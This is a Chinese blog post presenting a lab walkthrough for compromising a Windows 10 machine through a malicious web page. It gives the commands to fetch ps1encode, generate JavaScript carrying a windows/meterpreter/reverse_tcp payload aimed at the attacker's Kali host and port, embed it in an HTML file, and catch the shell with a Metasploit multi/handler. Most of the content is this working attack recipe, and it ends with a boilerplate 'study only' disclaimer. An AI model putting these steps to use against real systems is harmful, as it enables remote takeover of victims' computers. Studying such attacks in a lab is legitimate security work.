• 欢迎访问行云博客,推荐使用最新版火狐浏览器和Chrome浏览器访问本网站,欢迎加入行云博客 QQ群
  • 本站广招各类优秀作者,详情可以加群联系
  • 如果您觉得本站非常有看点,那么赶紧使用Ctrl+D 收藏行云博客吧

基于JavaScript的rce反弹shell漏洞

Windows渗透 行云 4个月前 (08-17) 221次浏览 已收录 0个评论 扫描二维码

环境要求

kali攻击机
192.168.232.131
win10靶机
192.168.232.140

工具地址

攻击步骤

拉取工具到kali的根目录下

1
git clone https://github.com/CroweCybersecurity/ps1encode.git

给权限

1
chmod +x pslencode

基于JavaScript的rce反弹shell漏洞-行云博客

生成恶意js代码

1
./ps1encode.rb --lhost 192.168.232.131 --lport 4444 --payload windows/meterpreter/reverse_tcp --ENCODE cmd -t js

基于JavaScript的rce反弹shell漏洞-行云博客

将生成的js代码放入一个js文件中,并通过HTML文件引入
基于JavaScript的rce反弹shell漏洞-行云博客

使用msf框架监听

use exploit/multi/handler
Set lport 4444
Set lhost 192.168.232.131
run

基于JavaScript的rce反弹shell漏洞-行云博客

靶机使用IE浏览器访问做好的HTML文件(此文件引入了恶意的js代码)
基于JavaScript的rce反弹shell漏洞-行云博客
基于JavaScript的rce反弹shell漏洞-行云博客
成功(PS:4444端口没成功,临时换成8848)
基于JavaScript的rce反弹shell漏洞-行云博客


行云博客 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负。 本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。 如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我(admin@xy586.top)联系处理。敬请谅解!

喜欢 (0)
[行云博客]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址